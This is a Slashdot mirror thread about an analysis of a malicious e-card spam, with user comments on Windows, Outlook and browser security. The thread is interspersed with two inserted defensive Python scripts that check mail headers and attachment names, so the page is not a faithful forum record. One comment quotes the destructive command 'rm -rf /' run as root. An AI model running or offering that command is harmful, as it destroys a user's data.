Slashdot Mirror


Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

482 comments

  1. I hate ecards by jwthompson2 · · Score: 5, Insightful

    This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.

    Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

    ---
    Mod me down, I'm already -1...woot!

    --
    Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
    1. Re:I hate ecards by ONOIML8 · · Score: 5, Insightful

      "Of course as a Mac user I don't have much to worry about with this."

      Perhaps you should. Most windows users are somewhat prepared for things like this because it's become a matter of routine. (sick as that is).

      But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
    2. Re:I hate ecards by jwthompson2 · · Score: 2, Insightful

      I agree. I have all my security settings turned to an appropriate level. With the exception of trusted sites, everything that happens requires my acceptance, so I am personally fairly safe, as far as I can be proactively. I can't say this with any certainty but other than IE do any other browsers allow installation of a remote file at all, let alone over top of an existing file? Plug-ins don't autoinstall on my Mac and javascript and Java run in a 'protected box' that limits their access to the system if I recall correctly. So this sort of thing really isn't an issue if all of that is as I believe.

      --
      Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
    3. Re:I hate ecards by ONOIML8 · · Score: 1

      "...so I am personally fairly safe, as far as I can be proactively."

      Well put.

      I'm not sure about browsers allowing file installation. I mean I know that Netscape/Mozilla will let you do that (like when adding themes) but you have to give permission first. As long as the browser source hasn't been tampered with I think it's ok. But it would be interesting to know from....well someone who knows for sure.

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
    4. Re:I hate ecards by lightspawn · · Score: 2, Funny

      Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

      Our society is fed up with poverty, disease and famine, but there's nothing to be done about those either.

      Microsoft is a huge, rich company. If they can't write secure software it can't be done, and anyway it's always the fault of the bad guys for doing bad stuff, never the fault of the company making it possible in the first place.

      (note - it's not my opinion, but I did talk to Joe Sixpack a few days ago and he said everybody except us geeks agreed that was the case).

    5. Re:I hate ecards by Spoing · · Score: 1
      1. But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.

      OK, why should we be worried again? (HTML off btw).

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    6. Re:I hate ecards by Anonymous Coward · · Score: 0

      Maybe you happen to be running a plain-text e-mail client that wipes your hard drive whenever it receives a message with the word 'Viagra' in the subject line? Who knows.

      I can make my Windows box safe from hackers... just unplug the ethernet cable. Accept whatever risk you want.

    7. Re:I hate ecards by Spoing · · Score: 1
      1. Maybe you happen to be running a plain-text e-mail client that wipes your hard drive whenever it receives a message with the word 'Viagra' in the subject line? Who knows.

      1. Nope. Evolution.

      2. Why special-case filter on anything these days?

      1. I can make my Windows box safe from hackers... just unplug the ethernet cable. Accept whatever risk you want.

      Why accept any risk?

      (Nit: 'crackers' are the bad guys, 'hackers' are the good guys.)

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    8. Re:I hate ecards by Anonymous Coward · · Score: 0

      If we all encouraged our banks to adopt rotating password systems (such as with various Swiss banks, you have a printed rotating list of passwords, or a calculator that generates them) that you use also with your password, then the keyloggers would be useless.

      Username: sdfhdsh
      Password: gjhfdhdf
      Rotating pass: ABCD -- please Mr Banker !!!

      Personally, I wouldn't use any other form of internet banking. And yet, the biggest banks in the US and Australia don't use it!

      What this boils down to is: slack and pathetic banking security, where responsibility for your account being leeched is your own!

    9. Re:I hate ecards by fermion · · Score: 1
      Wouldn't modification of default internet security settings go a long way to resolve this particular instance?

      Yes it would, and as a Mac user you should be concerned. Apple has been behaving extremely irresponsibly. HTML and images are turned on by default in the .mac web client and mail.app. Furthermore, all communication is readable only with images and HTML turned on. Therefore, if one wants to know the latest stuff at Apple, one is forced to engage in highly risky activities.

      At some point someone may target Mac users. Although Apple does more than many companies to protect the user, their ad department is clearly putting users at risk.

      --
      "She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
  2. Frightening by JackBuckley · · Score: 5, Insightful

    This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.

    1. Re:Frightening by Alizarin+Erythrosin · · Score: 4, Insightful

      Quite right. Not only can it be dangerous to your PC or bank account (if they install a key logger too, for example), but stuff like this steals your bandwidth, which some people in this world still pay for by amount, not a flat rate.

      Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

      --
      There are only 10 kinds of people in this world... those who understand binary and those who don't
    2. Re:Frightening by harmonica · · Score: 4, Insightful

      Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

      I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin privileges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

      But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.

    3. Re:Frightening by swordboy · · Score: 1, Troll

      A large fortune to anyone who creates an anti-spyware/adware package for Windows users who don't know the slightest bit about vulnerabilities like this. I'll pay lots of money for it. Until then, I'm still happy to charge people $50/hr to remove this crap.

      Alternatively, create a replacement for IE and Outlook that *look* like IE and Outlook. With this, I'll be able to replace Microsoft products with good (and possibly open-source) products without people bitching that they don't know how to use it.

      I still use IE because Mozilla doesn't SHIFT+Click with the same behavior (open in new window) as IE. I don't care if Mozilla is better because old habits are *very* difficult to break. It only takes about a month of screwing up the shift+click thing before I uninstall Mozilla and go back to IE. I won't even talk about that stupid dinosaur splash screen.

      Help!

      --

      Life is the leading cause of death in America.
    4. Re:Frightening by Anonymous Coward · · Score: 0

      I don't care if Mozilla is better because old habits are *very* difficult to break.

      Funnily enough I don't find that. A few months ago I was adamant that I'd never switch away from IE for that very reason. Then one night I had a vision in which a dinosaur clothe`d all in white... sorry, got a bit carried away there. One night I decided to try giving Firebird (as it was then) a real chance. Now whenever I find myself using a machine with only IE installed... I hit the wrong shortcut keys and get all frustrated.

      Yep, those are the same shortcut keys I thought I'd never be able to live without.

    5. Re:Frightening by darien · · Score: 2, Informative

      I dunno about shift-click, but I just click the little wheel on my mouse on a link and Mozilla opens it in a new tab. Which I (personally) think is way friendlier...

    6. Re:Frightening by mkoenecke · · Score: 2, Informative

      On Firefox 0.8, Shift-click certainly *does* open a new window, so I don't know what you are talking about. However, I've gotten so used to middle-click (open in new tab), which is quicker, that I had not checked before. Get Firefox instead.

      --
      TANSTAAFL
    7. Re:Frightening by diablobynight · · Score: 0

      They make tons of programs like this. Symantec for instance, the problem I see with them, is the very problem Microsoft tried to avoid in the beginning.
      My friend had Norton Internet security or some such bullshit on, and we could never figure out why she couldn't share out any of her files, or get at our files, on our personal network, then we found out Norton was blocking file sharing, and you didn't know it, unless you dug through the program and found the right option. Personally I find the nuisance that it presents to be greater than the risks. Because a simple process of not opening unknown email will solve most of your problems.
      Also, someone above said that people are getting 500$ phone bills from Russian hotlines after clicking a link.
      Apparently those Russians are smarter than me, 'cause I don't know how to increase someone's phone bill by having them click a link. Click a link, insert credit card number, or have modem dial out to another number, maybe. But just click the link, then suddenly get a bill a month later. It's this kind of exaggeration that causes people to get over excited about security and put on programs like blackice, that just kill your system all the time as opposed to a virus that might get it some of the time.

      --
      Anonymous Cowards - Oh God, How I hate you
    8. Re:Frightening by Cecil · · Score: 3, Informative

      I still use IE because Mozilla doesn't SHIFT+Click with the same behavior (open in new window) as IE ... I won't even talk about that stupid dinosaur splash screen.

      Wow, are you trolling or what? First of all, as of this writing, shift-clicking on a link in FireFox (formerly Firebird) does open it in a new window, although god knows why you'd want to do that when you can middle-click to open it in a tab in the background instead.

      Secondly, the "stupid dinosaur splash screen" (which I loved) has been gone for about 4 release versions of Mozilla now, to be replaced with a hideously drab orange box with 'Mozilla' written in it. Now that we've compromised on an ugly splash screen, no one's happy. Hooray for attempting to pander to everyone!

    9. Re:Frightening by Trurl's+Machine · · Score: 1

      Alternatively, create a replacement for IE and Outlook that *look* like IE and Outlook.

      Said replacement already exists. It is IE and Outlook... for Mac ;-).

    10. Re:Frightening by Crash6-24 · · Score: 1

      Microsoft employs some very smart people...
      A company can employ many smart people, ignore them, and appear to be run by idiots. Many times management is using something other than technical criteria to decide what to do - like finances, legal implications, massive ego, etc.
      What makes the Dilbert(R) comic strip so funny? That the smart people are managed by technically-clueless people.

    11. Re:Frightening by herulach · · Score: 1

      Maybe you should try Firefox, no splash screen, and the shift click opens in a new window, as in IE. Admittedly, it's not exactly the same, the window opens the same as the parent, so if that's maximized so is the child. But it's pretty damn similar, and I imagine there's a way to change the behaviour. I think ctrl-click in Firefox is much more useful (opens link in a background tab).

    12. Re:Frightening by swordboy · · Score: 1

      Wow, are you trolling or what?

      No.. not trolling... just very frustrated...

      I haven't tried Firefox because it isn't to version 1.0 implying that it isn't ready yet.

      But my whole point is that I can hardly expect someone to adopt a new browser if I can't even break a simple habit myself. Open source could have a large share of the market if the stuff just looked and acted like Microsoft products minus the insecurity.

      --

      Life is the leading cause of death in America.
    13. Re:Frightening by rworne · · Score: 1

      I don't know how many times I've looked for illicit crap on the net only to find my machine downloading .exe files on the sly while opening a web page.

      It's even more interesting and amusing when Safari does it.

      If that .exe file was downloaded on a Windows box and executed, it could install a dialer program of some sort. Then it would simply dial out late at night to some pay-per-call number. That's how clicking a link will get you a phone bill.

      If you have broadband, yank that old modem or disable it in the bios if it's built-in. This is especially true if you have people using the computer who show no common sense with e-mail or security in general.

      Problem solved.

      --
      I tried every decent and legal way I could think of to resolve the issue w/the business before I rented the chicken suit
    14. Re:Frightening by 1u3hr · · Score: 2, Informative
      I don't know how to increase someones phone bill by having them click a link.

      Here's a whole page of dialers that do stuff like that. A bigger problem in Europe I've heard.

    15. Re:Frightening by toddestan · · Score: 1

      I still use IE because Mozilla doesn't SHIFT+Click with the same behavior (open in new window) as IE. I don't care if Mozilla is better because old habits are *very* difficult to break.

      I don't know about Mozilla so much, but shift+click on Opera opens a new window like IE. Ctrl+shift+click opens a link in a new window in the background, a feature that you will probably find extremely handy.

    16. Re:Frightening by orkysoft · · Score: 1

      If Firefox were made by Microsoft or some other company, they'd have called the 0.8 version at least 4.0. (Besides, it's based on Mozilla, which has been > 1.0 for ages now.)

      Commercial companies and open source projects have very different version numbering schemes. Version 1.0 of Commercial Program X is much more likely to be buggy crap than a similar program, Version 1.0 of Open Source Program Y.

      --

      I suffer from attention surplus disorder.
    17. Re:Frightening by diablobynight · · Score: 1

      How does an executable get downloaded and installed without you clicking yes, install me? Do you have your security set lower than default?

      --
      Anonymous Cowards - Oh God, How I hate you
    18. Re:Frightening by diablobynight · · Score: 1

      Does your machine just download those EXEs without prompting you if it's OK? Mine prompts me and I say "no". Simple as that, don't click yes to programs installing in your computer, much like you don't just let strangers in your house.

      --
      Anonymous Cowards - Oh God, How I hate you
    19. Re:Frightening by xenoandroid · · Score: 1

      Both of which are no longer under development for the Mac.

    20. Re:Frightening by rworne · · Score: 1

      No, as a matter of fact it doesn't say anything at all. Sometimes I catch a brief flash of a window appearing and disappearing, that's all.

      Usually what's left (in Virtual PC running Windows 2000) is some weird executable sitting in the root directory of the C drive.

      In OS X, on the two or three times it's happened there, it just downloads to the desktop. And I've never been prompted to accept the download, and I turned off all the auto-install crap in IE. Safari can just do what it wants for now.

      None of it matters all that much, the executables do nothing in OS X, and Virtual PC is set up to "roll back" to a known state and discard changes to the disk. So if it gets infected with God-knows-what, I just restart it and all is well.

      --
      I tried every decent and legal way I could think of to resolve the issue w/the business before I rented the chicken suit
    21. Re:Frightening by danielsfca2 · · Score: 1

      Ok. First off, orkysoft is right, Firefox is pretty much rock-solid. I haven't had any problem with 0.7 or 0.8 (haven't used older versions).

      > if the stuff just looked and acted like Microsoft products minus the insecurity.

      Stop what you're doing right now. Go download Firefox and Thunderbird. Install and use them. Spend 2 minutes applying a tweak or two to the prefs.

      Instant drop-in IE replacement (and a decent OE replacement for a .3 release). I'm sure anybody who does this stuff professionally wouldn't have a problem duplicating the resulting set of prefs for future automatic use.

      Now, to address your comment another way, many things about the way IE "looked and acted" SUCK! For example, the toolbar--by default, about 15 huge 32x32 icons with text labels underneath. Most of which are useless. Plus those buttons and toolbars MS allows 3rd parties to add. So every crapware program on the computer adds a browser toolbar, and a button or two to the main toolbar. That's stupid. Contrast FF's default toolbar: Small buttons for back, forward, refresh, stop, home. Address bar in the same toolbar, plus a search box included. All in the same one-line toolbar. Far superior. Did it take time to get used to? About five minutes. The only people who would argue that IE's default (and by default I mean "for all the average joe cares, it's hard-coded") layout is desirable are those idiots who think all change is scary and harmful.

      As a bonus, and getting back on topic, FF of course doesn't support instant ActiveX installation of browser toolbars and other assorted stupidity.

    22. Re:Frightening by Reziac · · Score: 1

      They "made up for" removing the dinosaur splash screen (which at least gave me something to look at while Mozilla takes its time loading) by impaling his bloody head on the desktop icon, without providing any less eye-searing alternatives. Man, can you imagine the devlist flamewars that went on over this?

      Personally, I don't like tabs, but to each his own...

      --
      ~REZ~ #43301. Who'd fake being me anyway?
    23. Re:Frightening by 1u3hr · · Score: 1
      how does an executable get downloaded and installed without you clicking yes, install me. Do you have your security set lower than default?

      I don't run IE. Usually a Trojan I suppose: "install this plugin for free 3D porn" etc I guess.

    24. Re:Frightening by Anonymous Coward · · Score: 0

      Place a custom Mozilla.bmp in your mozilla directory, this will overwrite that "stupid dinosaur splash screen"

  3. You might remember me by Anonymous Coward · · Score: 5, Funny

    Hi. I'm Troy McClure. You might remember me from such e-mail how-to videos as "Nigeria: Your Path to Riches" and "Can I Lengthen my Penis 73 inches if I answer 22 emails?"

    1. Re:You might remember me by ggvaidya · · Score: 5, Interesting
      ... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

      Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

      Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

    2. Re:You might remember me by bobkate_nz · · Score: 1

      The other reason that trojans are more popular than 'real viruses' is that they're (like STDs) the gift that keeps on giving.

      No matter how much of a clueless gumby you are, you're always going to realise and react sooner to a virus that destroys data than malware that spies/keylogs/proxies/spams etc. If the virus destroys its host, or is obnoxious enough that the luser removes it promptly, there is far less opportunity for it to spread.

      Blaster(TM) is a good illustration.... how often do you hear about a hard-drive-deleting type virus that is so prevalent on some university's network that an unpatched workstation gets infected after 16 seconds?

  4. Re:e-cards by bad+enema · · Score: 3, Insightful

    Yes, but they do cost a person their time. Not very much, but I think it can be safely said that most e-cards are more fun to receive than normal greeting cards. And the quality of the e-card depends on how long the person has spent to pick it out.

  5. AOL Falling behind? by Faith_Healer · · Score: 2, Insightful

    Anyone else notice that the mail is originally from a compuserve address? I thought that the new AOL was supposed to be safe? =)

    --
    Faith_Healer -- The antethsis to almost everything, and the worlds worst speller.
    1. Re:AOL Falling behind? by Anonymous Coward · · Score: 0

      Noob, that is the HELO line, read what is in the parentheses for the actual origin.

    2. Re:AOL Falling behind? by scambaiter · · Score: 2, Insightful

      It actually isn't. A lot of spam has forged headers to look like it's coming from compuserve.com, aol.com, hotmail.com or microsoft.com. Never seen any of the given IPs resolve to one of those domains though.

      --
      sick of sigs... *sigh*
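
The HELO-versus-parentheses point made in the two replies above, as an added example that is not part of the original thread: a small checker that splits a `Received:` line into the name the sender claimed in HELO and the reverse DNS and IP the receiving server recorded, then flags disagreement. It assumes the Postfix/Sendmail-style layout `from HELO (rdns [ip]) by ...`; the sample message, host names and documentation-range addresses are constructed, and the last-two-labels domain comparison is a simplification.

```python
import re
from email import message_from_string

# Postfix/Sendmail-style trace line (assumed layout):
#   from <HELO name> (<reverse DNS> [<IP>]) by <receiver> ...
# The HELO name is whatever the sender typed; the parenthesised part is
# what the receiving server observed about the connection.
RECEIVED_RE = re.compile(
    r"^from\s+(?P<helo>\S+)\s+"
    r"\((?:(?P<rdns>[^\s\[\]()]+)\s+)?"
    r"\[(?:IPv6:)?(?P<ip>[0-9A-Fa-f.:]+)\]\)"
)


def registrable(name):
    """Comparison key: last two DNS labels (simplification, no public-suffix list)."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def analyze_received(value):
    """Return claimed HELO, observed rDNS/IP and a verdict, or None if unparsable."""
    unfolded = " ".join(value.split())  # undo header folding
    m = RECEIVED_RE.match(unfolded)
    if m is None:
        return None
    helo, rdns, ip = m.group("helo"), m.group("rdns"), m.group("ip")
    if rdns is None or rdns.lower() == "unknown":
        verdict = "no-rdns"          # receiver could not name the peer
    elif registrable(helo) == registrable(rdns):
        verdict = "consistent"
    else:
        verdict = "helo-mismatch"    # claimed name differs from observed name
    return {"helo": helo, "rdns": rdns, "ip": ip, "verdict": verdict}


def trace(raw_message):
    """Analyze every Received header, newest first.

    Only hop 0 is assumed to have been written by the recipient's own
    server; anything below it was supplied by the sender and may be forged.
    """
    msg = message_from_string(raw_message)
    hops = []
    for i, value in enumerate(msg.get_all("Received", [])):
        info = analyze_received(value)
        if info is not None:
            info["hop"] = i
            info["added_by_own_mta"] = (i == 0)
            hops.append(info)
    return hops


# Constructed sample message (not taken from the article or the thread).
SAMPLE = (
    "Received: from compuserve.com (dsl-45.example.net [192.0.2.45])\n"
    "\tby mx.recipient.example (Postfix) with SMTP id 0000000000\n"
    "\tfor <user@recipient.example>; Mon, 1 Jan 2001 00:00:00 +0000\n"
    "Received: from mail.aol.com (unknown [198.51.100.7])\n"
    "\tby compuserve.com with SMTP; Mon, 1 Jan 2001 00:00:00 +0000\n"
    "From: Greeting Cards <cards@compuserve.com>\n"
    "Subject: You have received an e-card\n"
    "\n"
    "(body omitted)\n"
)

if __name__ == "__main__":
    for hop in trace(SAMPLE):
        origin = "own MTA" if hop["added_by_own_mta"] else "sender-supplied"
        print(f'hop {hop["hop"]} ({origin}): HELO={hop["helo"]} '
              f'rDNS={hop["rdns"]} IP={hop["ip"]} -> {hop["verdict"]}')
```
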
  6. ok.... by clester · · Score: 1, Redundant

    Phew, that would be scary if I used Windows....

    --

    -- Real programmers don't comment their code. It was hard to write, it should be hard to understand.
  7. Bah by Anonymous Coward · · Score: 0, Redundant

    Doesn't affect me, Console e-mail with Mutt is the way to go. Mutt works on Cygwin, so Windows users don't have an excuse.

    1. Re:Bah by Anonymous Coward · · Score: 0

      Mutt works on Cygwin, so Windows users don't have an excuse.

      Gee, that strikes me as so much easier to install and use than using Mozilla thunderbird with HTML turned off.

    2. Re:Bah by Anonymous Coward · · Score: 0

      Thunderbird has too many bugs to be usable.

      Personally, I haven't run into any. What have you encountered? In any case, "too many bugs to be usable" is certainly an exaggeration.

      Plus I like looking at a dark terminal when reading mail. Is there a way to make Thunderbird show a black background while reading emails?

      Probably, but me not being a douchebag, I haven't looked into it.

    3. Re:Bah by orthogonal · · Score: 0, Offtopic

      Plus I like looking at a dark terminal when reading mail.

      Personally, when reading email I prefer looking into a dark monolith that's full of stars for pixels.

      Unfortunately, that doesn't run under cygwin because it's forever off-limits to us: while all the other worlds are ours, the monolith's on Europa, and we can attempt no landings there.

      Maybe I can get Thunderbird to show... naw.

  8. Re:e-cards by jwthompson2 · · Score: 4, Interesting

    Interesting take. I know my wife likes ecards because it is of course free which beats a card and stamp. She doesn't use them very often, except when she comes across a particularly funny or expressive one, and only when we forget to get a real card... :-)

    ---
    Mod me down...I'm already -1....woot!

    --
    Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
  9. Spam in Outlook by DoorFrame · · Score: 4, Interesting

    I was having a discussion with a friend the other day about Outlook email virii, and I quite frankly wasn't sure anymore. If a Windows box is completely updated, is it possible for an email to be able to unload/execute a virus without a user opening an attachment or clicking on an off-email link? Any examples?

    1. Re:Spam in Outlook by Anonymous Coward · · Score: 5, Insightful

      1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.

    2. Re:Spam in Outlook by dave420-2 · · Score: 5, Insightful
      The real problem isn't the technology, but the users. The same principle behind users opening unknown attachments also exhibits itself in the form of people deleting their windows directory.

      Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

      The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.

      Remember "security through obscurity"? Well, the reverse applies, too.

    3. Re:Spam in Outlook by 77Punker · · Score: 2, Insightful

      As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if your box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

    4. Re:Spam in Outlook by Swanktastic · · Score: 2, Insightful

      As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if your box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

      Of course, it could be pointed out that this is true for any piece of software.

      It's sort of a truism-- if a cracker is aware of an exploit that the OSS community does not know about, then your linux/BSD box is not secure either.

      I think the real answer to the Original Poster's question is "Probably not." It seems to me that 99% of viruses use public, well known exploits to compromise unpatched systems. It seems to be a much rarer occurrence where some black hat out there discovers the exploit and crafts a successful worm/virus/whatever around it.

    5. Re:Spam in Outlook by MooCows · · Score: 5, Informative

      This argument has been going on forever.
      And, IMHO, is only partly correct.
      Windows and its apps have many "by design" security flaws.

      Short list:
      - Horrible data-binding in many apps (IE/Outlook/etc)
      - Enabling scripts in emails to run in the local zone
      - No warnings for insecure passwords
      - NetBIOS open by default for the internet
      - IIS, period
      - Null sessions
      - Password hashing flaw (l0pht)

      Some of these are fixed, some are not.

      Apache runs on the majority of servers, and it isn't by far hacked as much... just figure.

      --
      The path I walk alone is endlessly long.
      30 minutes by bike, 15 by bus.
    6. Re:Spam in Outlook by DR+SoB · · Score: 1

      Sure, as soon as the next buffer overrun, or HTML exploit is found, it will be.. Examples? Take any of the last exploits, and go back in time, and there you have it..

      True: If your system is updated you are secure against OLD exploits. Here's the issue, knowing exploits happen at a given rate of like 1000 a month (haha, okay, say 1/2 a month.. whatever.), then every time a new exploit comes out, you could have a virus uploaded (well DOWNLOADED actually) and executed, without an attachment being opened (that preview pane sure is nice, eh?)..

      --
      Mod +5 Drunk
    7. Re:Spam in Outlook by corbettw · · Score: 1

      The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released.

      Actually, a virus that targets Linux (or any other UNIX look alike, eg Solaris) would make huge headlines. At least in the trade rags. Why? Because it's never happened before. The uniqueness of it alone would be cause to put it on the front page of every IT and Security publication in the world.

      --
      God invented whiskey so the Irish would not rule the world.
    8. Re:Spam in Outlook by msoftsucks · · Score: 1

      If you have any portion of ActiveX enabled - YES! There are so many ActiveX exploits that it is almost impossible to have a usable IE that is safe. If you totally turn off ActiveX, you constantly get nagged about how it's turned off and that the page may not render properly. I finally switched from IE to Firebird when I had to clean up over 30 machines infected with a variety of spyware. The forensics analysis showed that the spyware came from e-mail (Outlook), various web sites and from holes in M$ JVM. Apparently, there are now exploits that take advantage of the security holes that are in Microsoft's Java runtime. It was a mandatory install in XP SP1, can't be uninstalled, and M$ is no longer providing security fixes for it. The only way to resolve this security exploit is to install someone else's JVM (I installed Sun's).

      As long as you are running M$ software, you are vulnerable. No amount of press releases stating that Microsoft now "gets" security is going to change that.

      --
      Quit playing Monopoly with Bill.
      Linux - of the people, by the people, and for the people.
    9. Re:Spam in Outlook by ameoba · · Score: 1

      I suggest you go to a public computer lab running 2k/xp. Even a good one that's locked down, the machines are going to get clogged by spyware/adware/crap.

      --
      my sig's at the bottom of the page.
    10. Re:Spam in Outlook by Anonymous Coward · · Score: 0

      Here we go again; it is still the user's fault!

      Bull! Most of the capabilities that this article describes happen as soon as the user clicks on a link in the email. In no way should displaying a web-page allow this kind of malicious activity.

      You know, most hardcore Windows users remind me of the old joke about the alcoholic:

      "Because of drinking, I lost my wife, my family and my job. Then, because I wouldn't quit drinking, I lost my car, my house and my dog even ran away." He pauses thoughtfully, looking at his glass of bourbon. "But, you know what, I'm gonna give it just one more chance!"

    11. Re:Spam in Outlook by hymie3 · · Score: 1

      They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

      I would argue that the person saying "type in rm -rf /" is the dumbass, not the untrained person who trustingly followed directions.

    12. Re:Spam in Outlook by 77Punker · · Score: 1

      True, true! The fortunate thing about UNIXes is that most of your programs will be running as normal users, therefore all of those exploits will have little control over the machine. Windows, however, is usually run with a single user despite XP's ability to have multiple users. Windows can be secure on its own (my XP box is) if you know what security is.

    13. Re:Spam in Outlook by Anonymous Coward · · Score: 0
      1. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

      In online chat for games and other places, I've seen people tell nubies "That's a special menu, press ALT-F4 to bring it up". Madly typing "NOOOO!!!!!" doesn't help, as a moment later "BossMan has disconnected" appears on the screen.

    14. Re:Spam in Outlook by Spoing · · Score: 2, Informative

      I'll add;

      - Using file name extensions to identify files and to choose what will process the contents of those files
      - Hiding those same extensions by default

      These alone are a large part of the problem with Windows security.

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
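
Added example (not part of the comment above or of the original article): a small Python model of the two behaviours that comment names, choosing a handler by file extension and hiding known extensions, used to flag attachment names whose displayed form looks like a document while the real extension runs code. The extension sets and sample filenames are constructed assumptions, not Windows' actual association tables.

```python
"""Model of extension-based dispatch combined with hidden known extensions."""
import ntpath

# Assumption: small illustrative subsets, not the real Windows association tables.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta"}
DOCUMENT_EXTS = {".txt", ".jpg", ".gif", ".pdf", ".doc", ".html"}
KNOWN_EXTS = EXECUTABLE_EXTS | DOCUMENT_EXTS


def _leaf(filename):
    """Return the final path component with trailing dots/spaces removed,
    since Windows ignores those when it resolves a name."""
    return ntpath.basename(filename).rstrip(". ")


def real_extension(filename):
    """The extension the shell would use to pick a handler (last one only)."""
    return ntpath.splitext(_leaf(filename))[1].lower()


def displayed_name(filename, hide_known=True):
    """What the user sees: with hide_known set, a known final extension
    is dropped from the displayed name."""
    name = _leaf(filename)
    stem, ext = ntpath.splitext(name)
    if hide_known and ext.lower() in KNOWN_EXTS:
        return stem
    return name


def assess(filename):
    """Classify one attachment name as ok, executable or disguised-executable."""
    ext = real_extension(filename)
    shown = displayed_name(filename)
    # Extension the user *appears* to see once the real one is hidden.
    shown_ext = ntpath.splitext(shown.strip())[1].lower()
    if ext not in EXECUTABLE_EXTS:
        verdict = "ok"
    elif shown_ext in DOCUMENT_EXTS:
        verdict = "disguised-executable"
    else:
        verdict = "executable"
    return {"filename": filename, "displayed": shown,
            "real_ext": ext, "verdict": verdict}


def triage(filenames):
    """Return assessments for every name that would run code when opened."""
    results = [assess(f) for f in filenames]
    return [r for r in results if r["verdict"] != "ok"]


# Constructed sample attachment names, for illustration only.
SAMPLES = [
    "holiday-card.jpg",
    "ecard.html",
    "notes.v2.txt",
    "README",
    "greeting.exe",
    "greeting-card.jpg.exe",
    "C:\\Temp\\photo.gif.scr",
]

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print("%-24s shown as %-20s -> %s" % (
            row["filename"], row["displayed"], row["verdict"]))
```

A mail gateway or client could apply the same comparison to attachment names before display and show the full name whenever the verdict is not "ok".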
    15. Re:Spam in Outlook by Glenn+R-P · · Score: 1

      They just sit there, willingly running anything given to them

      My recently-coined name for them is e-rubes. After "rube", an
      awkward unpolished usually gullible rustic ignorant of urban ways
      (Webster's 3rd Intl). "I-rubes" is another possibility but I
      prefer "e-rubes".

      What amazes me is how many of them there are, evidenced by the spread
      of social-engineering trojans, one after another.

    16. Re:Spam in Outlook by fermion · · Score: 1
      It is the standard processing engineering problem that has faced us long before computers were widely known. How do we create a process that will ensure the job gets done properly? Of course, we could come up with some half ass process over a couple beers. When crap is produced, we can just blame the incompetent workers/users. Or, we could use our full ass, do our job, and create a process with inherent safeguards and quality checks.

      Windows has been a half ass effort. Your example has little merit. Opening up an unknown attachment is not the same thing as logging in as root. True, we try to educate users to do neither, but the similarity ends there. No *nix system I know of logs in as root automagically. Some payloads in Outlook are loaded automagically. We can disable email attachments altogether, but at some cost. We can keep the root system away from the *nix user at almost no cost.

      *nix system people are thinking hard about security. The sudo command is one good piece of evidence. It allows the user to run a command as root without permanently switching to the root account. Forgetting to log out of root was a major security issue. Sudo partially solves that problem.

      --
